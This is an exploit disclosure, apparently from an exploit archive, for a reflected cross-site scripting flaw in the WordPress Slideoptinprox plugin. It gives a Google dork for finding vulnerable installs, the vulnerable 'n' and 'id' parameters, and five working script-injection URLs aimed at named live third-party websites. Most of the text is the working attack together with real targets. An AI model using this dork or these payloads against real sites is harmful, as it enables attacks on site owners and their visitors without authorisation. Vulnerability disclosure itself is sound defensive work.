WordPress Slideoptinprox plugin suffers from a cross site scripting vulnerability.
8661c3a0a9f773bcc83a463d9878926cc6c87d2db8c147482e5dcdf578784960
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
|[*] Exploit Title: Wordpress slideoptinprox Plugin Cross site
scripting vulnerability
|
|[*] Google Dork: inurl:"/wp-content/plugins/slideoptinprox/"
|
|[*] Date : Date: 2015-01-08
|
|[*] Exploit Author: Ashiyane Digital Security Team
|
|[*]Vendor Homepage : https://pluginu.com/slideoptinprox/
|
|[*] Tested on: Windows 8.1,Kali Linux
|
|-------------------------------------------------------------------------|
|
|[*] Location :
[localhost]/wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=[XSS]
|
|-------------------------------------------------------------------------|
|[*] Proof:
|
|[*]
http://www.fishingfanatic.us/wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
|
|[*]
http://www.beziehung-retten24.com//wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
|
|[*]
http://voiceacting.com/blog//wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
|
|[*]
http://drdebranixon.com/wp-content/plugins/slideoptinprox/app/view.php?id=2%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
|
|[*]
http://pinguin-werkstatt.com//wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E|
|-------------------------------------------------------------------------|
|[*] Discovered By : 4L1R3Z4 |
|-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|